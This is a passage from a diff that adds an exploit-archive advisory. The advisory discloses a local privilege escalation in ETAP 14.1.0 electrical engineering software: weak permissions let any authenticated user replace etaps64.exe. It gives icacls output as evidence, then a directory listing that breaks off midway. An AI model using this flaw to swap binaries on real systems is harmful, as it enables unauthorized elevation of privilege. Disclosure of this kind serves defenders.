|
||||||
|
target.MenuItemCaptionValueY = arg1
|
||||||
|
</script>
|
||||||
|
</html>
|
481
platforms/windows/local/39845.txt
Executable file
481
platforms/windows/local/39845.txt
Executable file
|
@ -0,0 +1,481 @@
|
||||||
|
|
||||||
|
Operation Technology ETAP 14.1.0 Local Privilege Escalation
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Operation Technology, Inc.
|
||||||
|
Product web page: http://www.etap.com
|
||||||
|
Affected version: 14.1.0.0
|
||||||
|
|
||||||
|
Summary: Enterprise Software Solution for Electrical Power Systems. ETAP
|
||||||
|
is the most comprehensive electrical engineering software platform for the
|
||||||
|
design, simulation, operation, and automation of generation, transmission,
|
||||||
|
distribution, and industrial systems. As a fully integrated model-driven
|
||||||
|
enterprise solution, ETAP extends from modeling to operation to offer a
|
||||||
|
Real-Time Power Management System.
|
||||||
|
|
||||||
|
Desc: ETAP suffers from an elevation of privileges vulnerability which can
|
||||||
|
be used by a simple authenticated user that can change the executable file
|
||||||
|
with a binary of choice. The vulnerability exist due to the improper permissions,
|
||||||
|
with the 'C' flag (Change) for 'Authenticated Users' group.
|
||||||
|
|
||||||
|
Tested on: Microsfot Windows 7 Professional SP1 (EN) x86_64
|
||||||
|
Microsoft Windows 7 Ultimate SP1 (EN) x86_64
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2016-5323
|
||||||
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5323.php
|
||||||
|
|
||||||
|
|
||||||
|
07.04.2016
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
C:\>icacls "ETAP 1410"
|
||||||
|
ETAP 1410 BUILTIN\Administrators:(I)(F)
|
||||||
|
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(F)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||||
|
BUILTIN\Users:(I)(OI)(CI)(RX)
|
||||||
|
NT AUTHORITY\Authenticated Users:(I)(M)
|
||||||
|
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
|
||||||
|
|
||||||
|
|
||||||
|
C:\ETAP 1410>icacls etaps64.exe
|
||||||
|
etaps64.exe BUILTIN\Administrators:(I)(F)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(F)
|
||||||
|
BUILTIN\Users:(I)(RX)
|
||||||
|
NT AUTHORITY\Authenticated Users:(I)(M)
|
||||||
|
|
||||||
|
Successfully processed 1 files; Failed processing 0 files
|
||||||
|
|
||||||
|
|
||||||
|
Affected binaries:
|
||||||
|
------------------
|
||||||
|
|
||||||
|
C:\ETAP 1410>dir
|
||||||
|
Volume in drive C is Windows
|
||||||
|
Volume Serial Number is 56F3-8688
|
||||||
|
|
||||||
|
Directory of C:\ETAP 1410
|
||||||
|
|
||||||
|
07/04/2016 11:42 <DIR> .
|
||||||
|
07/04/2016 11:42 <DIR> ..
|
||||||
|
01/02/2016 11:14 766 16COLOR.CUR
|
||||||
|
19/01/2016 02:36 238,592 acsdvd.exe
|
||||||
|
19/01/2016 02:34 81,920 bifact.dll
|
||||||
|
19/01/2016 02:36 7,980,032 ca.exe
|
||||||
|
26/02/2016 16:56 1,220,608 cddll64.dll
|
||||||
|
19/01/2016 01:48 14,848 ComtradeReader.dll
|
||||||
|
17/11/2015 17:54 66,982 configdescriptions.xml
|
||||||
|
01/02/2016 11:14 1,620 ContourSetting.ini
|
||||||
|
07/04/2016 11:41 <DIR> Convert
|
||||||
|
19/01/2016 02:35 212,992 csdvd.exe
|
||||||
|
01/02/2016 11:14 27,136 ctl3d32.dll
|
||||||
|
19/01/2016 02:28 112,128 ctrlpb.exe
|
||||||
|
27/06/2013 15:17 7,582 Currency.xml
|
||||||
|
05/03/2009 12:44 65,536 dao.dll
|
||||||
|
07/04/2016 11:41 <DIR> Datablocks
|
||||||
|
26/02/2016 16:35 13,256,192 DATADB.dll
|
||||||
|
26/02/2016 16:51 19,252,736 datadb64.dll
|
||||||
|
10/08/2015 13:00 2,011,136 DBCompareInstr.mdb
|
||||||
|
10/08/2015 13:01 151,552 dbcompareinstr.sdf
|
||||||
|
08/10/2010 13:20 503,808 DBCompareOutput.mdb
|
||||||
|
05/11/2014 14:45 86,016 DBCompareOutput.sdf
|
||||||
|
08/10/2010 13:20 503,808 DBCompareSummary.mdb
|
||||||
|
05/11/2014 14:45 28,672 DBCompareSummary.sdf
|
||||||
|
19/01/2016 02:31 53,248 DBExtractConsoleApp.exe
|
||||||
|
19/01/2016 02:35 896,000 dccalc.exe
|
||||||
|
26/02/2016 16:54 352,256 dcspdt64.dll
|
||||||
|
26/02/2016 16:55 348,160 dcspst64.dll
|
||||||
|
01/02/2016 11:14 229,376 defaultA.mdb
|
||||||
|
01/02/2016 11:14 20,971,520 defaulte.mdb
|
||||||
|
01/02/2016 11:14 17,657,856 defaultm.mdb
|
||||||
|
01/02/2016 11:14 143,360 dunzip32.dll
|
||||||
|
01/02/2016 11:14 176,128 dzip32.dll
|
||||||
|
01/02/2016 11:14 3,262 e-dpp2.ico
|
||||||
|
01/02/2016 11:14 260,942 Electronic License Grant Terms.pdf
|
||||||
|
01/02/2016 11:14 315,392 enable40.dll
|
||||||
|
09/02/2016 17:38 137,728 enginemsgs.dll
|
||||||
|
19/01/2016 02:34 147,456 enginemsgs64.dll
|
||||||
|
19/01/2016 02:31 253,952 et2waydataxexcel.exe
|
||||||
|
19/01/2016 02:31 135,168 etaccess.exe
|
||||||
|
26/02/2016 16:52 3,872,768 ETAnalyzers64.dll
|
||||||
|
01/02/2016 11:14 76,999 etap.ico
|
||||||
|
25/03/2001 10:56 246,434 etap2csv.exe
|
||||||
|
19/01/2016 02:31 54,784 etapcim.dll
|
||||||
|
19/01/2016 02:31 1,174,528 EtapDevices.DLL
|
||||||
|
19/01/2016 02:31 67,072 EtapGISDevices.dll
|
||||||
|
19/01/2016 02:31 14,336 ETAPMongoDB.dll
|
||||||
|
26/02/2016 16:24 1,325,568 Etapmsgs.dll
|
||||||
|
26/02/2016 16:38 1,335,296 etapmsgs64.dll
|
||||||
|
05/02/2016 17:04 49,012,284 etaps.chm
|
||||||
|
07/04/2016 11:45 660 ETAPS.INI
|
||||||
|
09/12/2003 12:13 88 etaps.pek
|
||||||
|
26/02/2016 17:23 86,749,184 etaps64.exe
|
||||||
|
22/06/2011 17:40 6,130 ETAPS64.exe.config
|
||||||
|
26/02/2016 16:29 23,688,704 etapsdb.dll
|
||||||
|
26/02/2016 16:45 26,805,248 etapsdb64.dll
|
||||||
|
19/01/2016 02:31 125,440 EtapSmartPlant.exe
|
||||||
|
26/06/2015 12:51 24,571,904 etapsqlenglishmodel.bak
|
||||||
|
26/06/2015 12:52 24,436,736 etapsqlmetricmodel.bak
|
||||||
|
19/01/2016 02:31 52,736 ETAP_CIM.EXE
|
||||||
|
01/02/2016 11:14 6,184 etap_dy_.ttf
|
||||||
|
19/01/2016 02:31 94,208 etap_edpp.exe
|
||||||
|
19/01/2016 02:31 20,480 ETAP_GlobalUtilities.dll
|
||||||
|
19/01/2016 02:31 32,768 ETAP_Graphics.dll
|
||||||
|
24/06/2015 08:40 9,977,953 etap_overview.pdf
|
||||||
|
26/02/2016 16:27 44,032 EtArcFlash.dll
|
||||||
|
26/02/2016 16:44 51,712 EtArcFlash64.dll
|
||||||
|
19/01/2016 02:31 192,512 etarcgis.exe
|
||||||
|
19/01/2016 02:31 192,512 etarcgis92.exe
|
||||||
|
19/01/2016 02:31 192,512 etarcgis93.exe
|
||||||
|
19/01/2016 02:31 427,520 ETArcGIS_TD.exe
|
||||||
|
19/01/2016 02:31 428,544 ETArcGIS_TD10.exe
|
||||||
|
26/02/2016 16:54 417,792 etbatt64.dll
|
||||||
|
26/02/2016 16:52 614,912 ETBranch64.dll
|
||||||
|
26/02/2016 16:26 1,353,728 etcabp.exe
|
||||||
|
26/02/2016 16:53 4,139,008 etcb64.dll
|
||||||
|
26/02/2016 16:54 1,220,096 etcharg64.dll
|
||||||
|
19/01/2016 02:28 307,712 ETConfig.EXE
|
||||||
|
14/09/2015 08:44 287 ETConfig.exe.config
|
||||||
|
19/01/2016 02:34 68,096 etcp.exe
|
||||||
|
19/01/2016 02:31 225,280 etdatamapper.dll
|
||||||
|
19/01/2016 02:31 172,032 etdataxexcel.exe
|
||||||
|
26/02/2016 16:54 3,728,384 etdc64.dll
|
||||||
|
26/02/2016 16:54 433,152 etdcbus64.dll
|
||||||
|
26/02/2016 16:54 768,512 etdccb64.dll
|
||||||
|
26/02/2016 16:54 970,752 etdced64.dll
|
||||||
|
26/02/2016 16:54 406,528 etdcfuse64.dll
|
||||||
|
26/02/2016 16:54 334,336 etdcimp64.dll
|
||||||
|
26/02/2016 16:54 367,104 etdcknvt64.dll
|
||||||
|
26/02/2016 16:54 448,512 etdclmp64.dll
|
||||||
|
26/02/2016 16:55 1,019,904 etdcmach64.dll
|
||||||
|
26/02/2016 16:54 422,912 etdcstl64.dll
|
||||||
|
19/01/2016 02:31 1,228,800 etdevices.dll
|
||||||
|
19/01/2016 02:40 150,528 ETDistanceRelay64.dll
|
||||||
|
19/01/2016 02:31 135,168 ETDXF.exe
|
||||||
|
26/02/2016 16:38 633,344 ETEAView.exe
|
||||||
|
01/02/2016 11:14 3,771 ETEAView.exe.config
|
||||||
|
19/01/2016 02:31 651,776 ETEZPowerImport.dll
|
||||||
|
19/01/2016 02:31 8,192 ETFilter.exe
|
||||||
|
19/01/2016 02:31 102,400 etglu.dll
|
||||||
|
19/01/2016 02:31 89,088 etglu64.dll
|
||||||
|
19/01/2016 02:34 168,448 etgrd.exe
|
||||||
|
26/02/2016 16:56 704,000 ethf64.dll
|
||||||
|
26/02/2016 16:26 285,184 ETInterchange.exe
|
||||||
|
01/02/2016 11:14 3,688 ETInterchange.exe.config
|
||||||
|
26/02/2016 16:55 1,471,488 etinvert64.dll
|
||||||
|
26/02/2016 16:52 231,936 etlayout64.dll
|
||||||
|
26/02/2016 16:44 187,392 etlncalc64.dll
|
||||||
|
26/02/2016 16:56 9,623,552 etload64.dll
|
||||||
|
19/01/2016 02:31 414,720 ETMergeSync.exe
|
||||||
|
19/01/2016 02:28 1,081,344 EtMongoUnmanaged.DLL
|
||||||
|
26/02/2016 16:52 292,352 etmtrupd64.dll
|
||||||
|
19/01/2016 02:31 51,712 ETMultispeak.exe
|
||||||
|
19/01/2016 02:31 73,728 ETPanelRep.exe
|
||||||
|
14/09/2015 08:44 3,262 etpanelrep.ico
|
||||||
|
26/02/2016 16:52 918,016 etpe64.dll
|
||||||
|
26/02/2016 16:45 107,008 ETPlugIn64.dll
|
||||||
|
26/02/2016 16:25 42,496 ETPMStatus.EXE
|
||||||
|
01/02/2016 11:14 626 ETPMStatus.exe.config
|
||||||
|
26/02/2016 16:52 776,192 etprofile64.dll
|
||||||
|
19/01/2016 02:28 94,208 etpsmsexcel.exe
|
||||||
|
01/02/2016 11:14 2,032 EtPSMSExcel.exe.config
|
||||||
|
19/01/2016 02:31 126,976 etrawdata.exe
|
||||||
|
26/02/2016 16:52 389,632 etreac64.dll
|
||||||
|
26/02/2016 16:27 4,935,680 etrep.dll
|
||||||
|
26/02/2016 16:43 6,328,320 etrep64.dll
|
||||||
|
19/01/2016 02:31 32,768 ETRepAnalyzer.exe
|
||||||
|
19/01/2016 02:32 496,128 ETSkmParser.dll
|
||||||
|
26/02/2016 16:36 5,586,432 EtStudyCase.dll
|
||||||
|
26/02/2016 16:53 7,607,296 EtStudyCase64.dll
|
||||||
|
26/02/2016 16:53 2,739,200 ETTrack64.dll
|
||||||
|
26/02/2016 16:26 1,235,968 ettrend.exe
|
||||||
|
01/02/2016 11:14 4,348 EtTrend.exe.config
|
||||||
|
26/02/2016 16:25 20,480 ettrenddata.dll
|
||||||
|
26/02/2016 16:55 1,253,888 etups64.dll
|
||||||
|
26/02/2016 16:55 1,185,792 etvfd64.dll
|
||||||
|
19/01/2016 02:31 90,112 ET_CATIA.exe
|
||||||
|
19/01/2016 02:31 45,056 et_ieee.exe
|
||||||
|
07/04/2016 11:44 <DIR> Example-ANSI
|
||||||
|
07/04/2016 11:41 <DIR> Example-IEC
|
||||||
|
07/04/2016 11:41 <DIR> Example-New
|
||||||
|
07/04/2016 11:41 <DIR> ExcelTemplates
|
||||||
|
01/02/2016 11:14 433,230 filter.xml
|
||||||
|
01/02/2016 11:14 566 filterall.xml
|
||||||
|
03/04/2015 12:50 197,074 FilterDXF.xml
|
||||||
|
08/10/2010 13:20 99,171 FilterOpenExcel.xml
|
||||||
|
07/04/2016 11:41 <DIR> Filters
|
||||||
|
01/02/2016 11:14 33,363 FilterSync.xml
|
||||||
|
19/01/2016 02:34 102,912 fludbl.dll
|
||||||
|
07/04/2016 11:42 <DIR> Formats1400
|
||||||
|
07/04/2016 11:42 <DIR> Formats1410
|
||||||
|
19/01/2016 02:34 9,728 gasolve.dll
|
||||||
|
04/05/2004 10:53 1,645,320 gdiplus.dll
|
||||||
|
26/02/2016 16:25 115,712 grddata.dll
|
||||||
|
26/02/2016 16:25 245,248 grdrep.dll
|
||||||
|
19/01/2016 02:34 9,050,112 harmonic.exe
|
||||||
|
04/11/2004 08:54 471,040 HHActiveX.dll
|
||||||
|
26/02/2016 16:25 443,904 ILSEngine.dll
|
||||||
|
26/02/2016 16:38 560,128 ilsengine64.dll
|
||||||
|
26/02/2016 16:25 81,920 ilsutils.dll
|
||||||
|
26/02/2016 16:38 77,824 ILSUtils64.dll
|
||||||
|
01/02/2016 11:14 12,170 ILS_Report_Logo.jpg
|
||||||
|
01/02/2016 11:14 26,383 ils_snapshot_stylesheet.xsl
|
||||||
|
01/02/2016 11:14 45,056 ImageComboBox.dll
|
||||||
|
01/02/2016 11:14 148,488 Infragistics.Shared.v2.dll
|
||||||
|
01/02/2016 11:14 147,456 Infragistics.Shared.v3.dll
|
||||||
|
01/02/2016 11:14 1,074,208 Infragistics.Win.UltraWinGrid.v2.dll
|
||||||
|
01/02/2016 11:14 1,241,088 Infragistics.Win.UltraWinGrid.v3.dll
|
||||||
|
01/02/2016 11:14 914,456 Infragistics.Win.v2.dll
|
||||||
|
01/02/2016 11:14 1,236,992 Infragistics.Win.v3.dll
|
||||||
|
05/03/2009 12:44 65,536 Interop.DAO.dll
|
||||||
|
01/02/2016 11:14 1,089,536 Interop.Excel.dll
|
||||||
|
01/02/2016 11:14 217,088 interop.Microsoft.Office.Core.dll
|
||||||
|
03/08/2004 23:56 69,632 interop.msxml.dll
|
||||||
|
05/03/2009 12:44 11,776 interop.stdtype.dll
|
||||||
|
24/01/2011 04:54 57,344 Interop.VBIDE.dll
|
||||||
|
19/01/2016 02:36 1,227,264 LA3PH.exe
|
||||||
|
19/01/2016 02:37 4,359,680 LF3PH.exe
|
||||||
|
19/01/2016 02:36 4,397,568 LF3PHDLL.dll
|
||||||
|
19/01/2016 02:35 6,849,536 lffd.exe
|
||||||
|
19/01/2016 02:36 6,247,936 lfgs.exe
|
||||||
|
19/01/2016 02:35 6,390,272 lfle.exe
|
||||||
|
19/01/2016 02:37 7,419,904 lfnr.exe
|
||||||
|
07/04/2016 11:41 <DIR> lib
|
||||||
|
26/02/2016 16:36 1,601,536 libacc.dll
|
||||||
|
26/02/2016 16:52 2,033,152 libacc64.dll
|
||||||
|
26/02/2016 16:34 29,691,392 libsdll.dll
|
||||||
|
26/02/2016 16:50 35,940,864 libsdll64.dll
|
||||||
|
19/01/2016 01:49 102,400 lineq.dll
|
||||||
|
09/02/2016 17:53 122,368 LinEq64.dll
|
||||||
|
26/02/2016 16:24 1,609,216 locetaps.dll
|
||||||
|
26/02/2016 16:38 1,701,888 locetaps64.dll
|
||||||
|
26/02/2016 16:24 133,632 locetcom.dll
|
||||||
|
26/02/2016 16:38 143,872 locetcom64.dll
|
||||||
|
01/02/2016 11:14 327,556 Logo.png
|
||||||
|
26/02/2016 16:25 105,984 MDBCompare.exe
|
||||||
|
01/02/2016 11:14 149 MDBCompare.exe.config
|
||||||
|
26/02/2016 16:24 20,480 MDBCompareHelper.dll
|
||||||
|
07/12/1999 04:00 995,383 mfc42.dll
|
||||||
|
26/02/2016 11:48 7,208,960 mfclog.dll
|
||||||
|
26/02/2016 12:01 2,949,120 mfclogb.dll
|
||||||
|
26/02/2016 11:57 4,390,912 mfcloge.dll
|
||||||
|
16/02/2016 15:41 8,716,288 mfclogl.dll
|
||||||
|
26/02/2016 11:48 29,425,664 mfcmdb.dll
|
||||||
|
26/02/2016 12:01 26,279,936 mfcmdbb.dll
|
||||||
|
26/02/2016 11:57 28,377,088 mfcmdbe.dll
|
||||||
|
16/02/2016 15:41 29,425,664 mfcmdbl.dll
|
||||||
|
05/10/2013 01:38 23,720 MFCMIFC80.DLL
|
||||||
|
26/02/2016 11:48 10,240 mfcoti.dll
|
||||||
|
26/02/2016 12:01 10,240 mfcotib.dll
|
||||||
|
26/02/2016 11:57 10,240 mfcotie.dll
|
||||||
|
16/02/2016 15:41 10,240 mfcotil.dll
|
||||||
|
26/09/2013 17:12 331,776 MFCPB.DLL
|
||||||
|
26/02/2016 11:42 29,853,696 mfcpso.dll
|
||||||
|
26/08/2015 15:54 1,536 mfcpsob.dll
|
||||||
|
01/10/2015 08:36 22,067,712 mfcpsoe.dll
|
||||||
|
26/08/2015 16:40 22,182,912 mfcpsol.dll
|
||||||
|
01/02/2016 11:14 1,100,392 Microsoft.Office.Interop.Excel.dll
|
||||||
|
01/02/2016 11:14 781,104 Microsoft.Office.Interop.Word.dll
|
||||||
|
01/02/2016 11:14 161,192 Microsoft.Practices.EnterpriseLibrary.Common.dl
|
||||||
|
01/02/2016 11:14 91,560 Microsoft.Practices.EnterpriseLibrary.Data.dll
|
||||||
|
01/02/2016 11:14 42,408 Microsoft.Practices.EnterpriseLibrary.Logging.D
|
||||||
|
01/02/2016 11:14 218,536 Microsoft.Practices.EnterpriseLibrary.Logging.d
|
||||||
|
01/02/2016 11:14 64,352 Microsoft.Practices.ObjectBuilder.dll
|
||||||
|
01/02/2016 11:14 64,088 Microsoft.Vbe.Interop.dll
|
||||||
|
01/02/2016 11:14 379,392 MongoDB.Bson.dll
|
||||||
|
01/02/2016 11:14 559,104 MongoDB.Driver.dll
|
||||||
|
19/01/2016 02:37 7,927,808 ms.exe
|
||||||
|
18/08/2001 04:00 1,388,544 msvbvm60.dll
|
||||||
|
29/08/2000 00:00 401,462 Msvcp60.dll
|
||||||
|
04/05/2001 11:05 290,869 MSVCRT.DLL
|
||||||
|
07/12/1999 04:00 253,952 msvcrt20.dll
|
||||||
|
07/12/1999 04:00 65,024 msvcrt40.dll
|
||||||
|
19/01/2016 02:36 6,827,008 OCP.exe
|
||||||
|
01/02/2016 11:14 223,800 Office.dll
|
||||||
|
01/02/2016 11:14 2,429 olhtypicalcurves.xml
|
||||||
|
01/02/2016 11:14 6,335 OnlineToolbar.xaml
|
||||||
|
01/02/2016 11:14 96,256 Opc.Ua.Client.dll
|
||||||
|
19/01/2016 02:28 167,936 Opc.Ua.ClientControls.dll
|
||||||
|
01/02/2016 11:14 102,400 Opc.Ua.Configuration.dll
|
||||||
|
01/02/2016 11:14 91,564 Opc.Ua.Configuration.xml
|
||||||
|
01/02/2016 11:14 2,970,624 Opc.Ua.Core.dll
|
||||||
|
01/02/2016 11:14 5,606,536 Opc.Ua.Core.xml
|
||||||
|
19/01/2016 02:29 112,128 OPCEPICS.exe
|
||||||
|
19/01/2016 02:36 6,549,504 opf.exe
|
||||||
|
07/04/2016 11:41 <DIR> Other
|
||||||
|
19/01/2016 02:28 336,896 Oti.UAToolkit.dll
|
||||||
|
26/02/2016 16:38 108,544 otiAGCView.dll
|
||||||
|
26/02/2016 16:25 132,096 otibin.dll
|
||||||
|
26/02/2016 16:24 106,496 oticommon.dll
|
||||||
|
26/02/2016 16:38 102,400 oticommon64.dll
|
||||||
|
26/02/2016 16:38 77,824 oticonfig.dll
|
||||||
|
26/02/2016 16:38 9,728 oticonfig.xmlserializers.dll
|
||||||
|
26/02/2016 16:38 167,936 OTIContingency.dll
|
||||||
|
24/11/2015 18:54 121,344 OtiContourConfig.exe
|
||||||
|
26/02/2016 16:28 263,680 OtiDistanceRelay.dll
|
||||||
|
26/02/2016 16:44 263,168 OtiDistanceRelay64.dll
|
||||||
|
26/02/2016 16:55 1,660,928 OtiDistribDataManager64.dll
|
||||||
|
26/02/2016 16:44 84,992 OTIDistribution.dll
|
||||||
|
26/02/2016 16:26 124,928 OTIEA.DLL
|
||||||
|
26/02/2016 16:38 8,704 OtiEmfToXaml.exe
|
||||||
|
26/02/2016 16:38 17,920 OtiExcelReport.dll
|
||||||
|
26/02/2016 17:22 4,165,632 otigraph.dll
|
||||||
|
26/02/2016 16:38 161,280 otigraph.xmlserializers.dll
|
||||||
|
26/02/2016 16:28 634,368 OtiGridView.dll
|
||||||
|
26/02/2016 16:43 638,976 OtiGridView64.dll
|
||||||
|
26/02/2016 16:25 613,888 OtiInterchange.dll
|
||||||
|
26/02/2016 16:25 36,864 OtiInterchange.XMLSerializers.DLL
|
||||||
|
26/02/2016 16:38 613,376 OtiInterchange64.dll
|
||||||
|
19/01/2016 02:31 183,296 OTIKmlToGis.exe
|
||||||
|
26/02/2016 16:38 239,104 otilayermanager.dll
|
||||||
|
26/02/2016 16:38 205,824 OtiLibrary.dll
|
||||||
|
26/02/2016 16:26 949,760 OtiManage.dll
|
||||||
|
26/02/2016 16:39 1,397,248 otimanage64.dll
|
||||||
|
26/02/2016 16:38 72,704 OtiManagedDlg64.dll
|
||||||
|
26/02/2016 16:25 25,600 otimdbtosql.exe
|
||||||
|
26/02/2016 16:25 398,336 otimf32.exe
|
||||||
|
26/02/2016 16:25 12,288 OtiMongoConvert.exe
|
||||||
|
26/02/2016 16:38 133,632 OtiMongoManaged.dll
|
||||||
|
26/02/2016 16:25 29,696 OTIOpCon.DLL
|
||||||
|
26/02/2016 16:38 29,184 OtiOpCon64.dll
|
||||||
|
19/01/2016 02:28 12,800 OtiPMConfiguration.dll
|
||||||
|
26/02/2016 16:38 59,904 OtiRemotecode64.dll
|
||||||
|
26/02/2016 16:38 60,928 OtiRemotecodeinterfaces64.dll
|
||||||
|
26/02/2016 16:52 538,112 OtiRTDisplay64.dll
|
||||||
|
26/02/2016 16:38 9,216 OtiRTDisplayInterface.dll
|
||||||
|
26/02/2016 16:38 86,528 OtiRtWpfControls.dll
|
||||||
|
26/02/2016 16:38 24,576 OtiRtWpfControlsTelerik.dll
|
||||||
|
26/02/2016 16:38 574,976 OTIRuleManager.dll
|
||||||
|
26/02/2016 16:38 24,576 OTIRuleManager.XmlSerializers.dll
|
||||||
|
26/02/2016 17:22 487,424 otiscenario.dll
|
||||||
|
26/02/2016 16:38 16,384 OTIScenario.XmlSerializers.dll
|
||||||
|
26/02/2016 16:25 209,920 OtiServerTracker.dll
|
||||||
|
26/02/2016 16:38 238,592 OtiServerTracker64.dll
|
||||||
|
26/02/2016 16:38 5,632 OtiSQLCERead.dll
|
||||||
|
26/02/2016 16:28 96,768 OtiSQLCeViewer.EXE
|
||||||
|
19/01/2016 02:28 12,800 OtiSqlUtils.dll
|
||||||
|
26/02/2016 16:25 229,888 OtiSymbolCreator.exe
|
||||||
|
26/02/2016 16:24 8,704 OtiSymbolData.dll
|
||||||
|
26/02/2016 16:25 428,032 OtiSymbolSerializer.dll
|
||||||
|
26/02/2016 16:38 1,163,264 otitheme.dll
|
||||||
|
26/02/2016 16:38 210,432 otitheme.xmlserializers.dll
|
||||||
|
26/02/2016 16:38 287,744 OtiTrack.dll
|
||||||
|
19/01/2016 02:02 1,043,505 OtiTranslate.xml
|
||||||
|
26/02/2016 16:36 125,952 pdconfig.exe
|
||||||
|
19/01/2016 02:31 589,824 PDEUtilities.dll
|
||||||
|
01/02/2016 11:14 3,760,128 Pegrp32E.dll
|
||||||
|
01/02/2016 11:14 24,576 PerfSol.Diagnostics.dll
|
||||||
|
26/02/2016 16:45 98,816 PlotCompare64.exe
|
||||||
|
26/02/2016 16:45 159,744 PlotFileReader.dll
|
||||||
|
26/02/2016 16:45 477,184 PlotManager.exe
|
||||||
|
01/02/2016 11:14 144 PlotManager.exe.config
|
||||||
|
01/02/2016 11:14 8,945 postaction.cgt
|
||||||
|
01/02/2016 11:14 6,767 precondition.cgt
|
||||||
|
19/01/2016 02:28 306,688 psedit.exe
|
||||||
|
26/02/2016 16:24 253,440 psevent.dll
|
||||||
|
26/02/2016 16:26 1,324,544 psgrid.exe
|
||||||
|
08/10/2010 13:20 16,384 psreport.dot
|
||||||
|
26/02/2016 16:25 189,440 psrept.exe
|
||||||
|
01/02/2016 11:14 223 psrept.exe.config
|
||||||
|
26/02/2016 16:25 60,928 pszip.exe
|
||||||
|
07/04/2016 11:41 <DIR> pvdt40
|
||||||
|
26/02/2016 16:25 125,952 QCPlot.dll
|
||||||
|
26/02/2016 16:39 148,480 qcplot64.dll
|
||||||
|
19/01/2016 02:36 201,216 ra.exe
|
||||||
|
07/12/2015 22:07 3,593,218 Readme.pdf
|
||||||
|
15/11/2002 10:51 13,755 Readme.wizard.xml
|
||||||
|
18/12/2007 13:10 99 RegETAP.BAT
|
||||||
|
08/10/2010 13:20 14,848 reporta4.dot
|
||||||
|
03/08/2000 04:50 1,056,768 ROBOEX32.DLL
|
||||||
|
07/04/2016 11:45 <DIR> Rules
|
||||||
|
19/01/2016 02:36 1,939,456 SC3Ph.exe
|
||||||
|
19/01/2016 02:35 5,971,968 scansi1p.exe
|
||||||
|
19/01/2016 02:36 5,232,640 scansi3p.exe
|
||||||
|
19/01/2016 02:35 6,535,168 SCGost1p.exe
|
||||||
|
19/01/2016 02:36 6,431,232 sciec1p.exe
|
||||||
|
19/01/2016 02:37 5,242,880 sciec3p.exe
|
||||||
|
19/01/2016 02:35 4,812,288 sciectr.exe
|
||||||
|
19/01/2016 02:37 5,063,680 scsource.exe
|
||||||
|
01/02/2016 11:14 21,020 search.avi
|
||||||
|
19/01/2016 02:36 7,451,648 SFA.exe
|
||||||
|
26/02/2016 16:38 32,768 ShellControl.dll
|
||||||
|
19/01/2016 02:32 1,114,112 SkmDataParserLib.dll
|
||||||
|
01/02/2016 11:14 77 SO.ini
|
||||||
|
19/01/2016 02:36 708,096 so3ph.exe
|
||||||
|
19/01/2016 02:34 752,640 stlf.exe
|
||||||
|
19/01/2016 02:35 5,911,040 svc.exe
|
||||||
|
01/02/2016 11:14 3,198,976 SX.dll
|
||||||
|
07/04/2016 11:41 <DIR> Symbols
|
||||||
|
07/04/2016 11:42 <DIR> SymbolsXaml
|
||||||
|
01/02/2016 11:14 1,081,344 SyncFusion.Chart.Base.dll
|
||||||
|
01/02/2016 11:14 602,112 SyncFusion.Chart.Windows.dll
|
||||||
|
01/02/2016 11:14 61,440 SyncFusion.Compression.Base.dll
|
||||||
|
01/02/2016 11:14 122,880 SyncFusion.Core.dll
|
||||||
|
01/02/2016 11:14 1,105,920 syncfusion.diagram.base.dll
|
||||||
|
01/02/2016 11:14 1,224,704 Syncfusion.Diagram.Windows.dll
|
||||||
|
01/02/2016 11:14 3,710,976 Syncfusion.DocIO.Base.dll
|
||||||
|
01/02/2016 11:14 16,384 SyncFusion.Grid.Base.dll
|
||||||
|
01/02/2016 11:14 16,384 SyncFusion.Grid.Grouping.Base.dll
|
||||||
|
01/02/2016 11:14 1,003,520 SyncFusion.Grid.Grouping.Windows.dll
|
||||||
|
01/02/2016 11:14 2,146,304 SyncFusion.Grid.Windows.dll
|
||||||
|
01/02/2016 11:14 94,208 SyncFusion.GridConverter.Windows.dll
|
||||||
|
01/02/2016 11:14 814,080 Syncfusion.GridHelperClasses.Windows.dll
|
||||||
|
01/02/2016 11:14 565,248 SyncFusion.Grouping.Base.dll
|
||||||
|
01/02/2016 11:14 192,512 SyncFusion.HTMLUI.Base.dll
|
||||||
|
01/02/2016 11:14 389,120 SyncFusion.HTMLUI.Windows.dll
|
||||||
|
01/02/2016 11:14 53,248 SyncFusion.Scripting.Base.dll
|
||||||
|
01/02/2016 11:14 131,072 SyncFusion.Scripting.Windows.dll
|
||||||
|
01/02/2016 11:14 4,055,040 SyncFusion.Shared.Base.dll
|
||||||
|
01/02/2016 11:14 26,112 SyncFusion.Shared.Windows.dll
|
||||||
|
01/02/2016 11:14 13,049,856 Syncfusion.Shared.Wpf.dll
|
||||||
|
01/02/2016 11:14 16,384 SyncFusion.Tools.Base.dll
|
||||||
|
01/02/2016 11:14 9,453,568 SyncFusion.Tools.Windows.dll
|
||||||
|
01/02/2016 11:14 4,284,416 SyncFusion.XlsIO.Base.dll
|
||||||
|
01/02/2016 11:14 7,090 syslogic.cgt
|
||||||
|
07/04/2016 11:41 <DIR> Tables
|
||||||
|
01/02/2016 11:14 8,700 tables.ecd
|
||||||
|
01/02/2016 11:14 389,120 tag.mdb
|
||||||
|
19/01/2016 02:31 172,032 tccconvert.dll
|
||||||
|
19/01/2016 02:31 516,608 tccimport.exe
|
||||||
|
19/01/2016 02:36 2,227,200 TDULF.exe
|
||||||
|
19/01/2016 02:31 205,824 TDUpdate.exe
|
||||||
|
01/02/2016 11:14 1,308,672 Telerik.Windows.Controls.Chart.dll
|
||||||
|
01/02/2016 11:14 3,068,928 Telerik.Windows.Controls.Charting.dll
|
||||||
|
01/02/2016 11:14 1,734,656 Telerik.Windows.Controls.Data.dll
|
||||||
|
01/02/2016 11:14 4,346,368 Telerik.Windows.Controls.DataVisualization.dll
|
||||||
|
01/02/2016 11:14 3,376,640 Telerik.Windows.Controls.dll
|
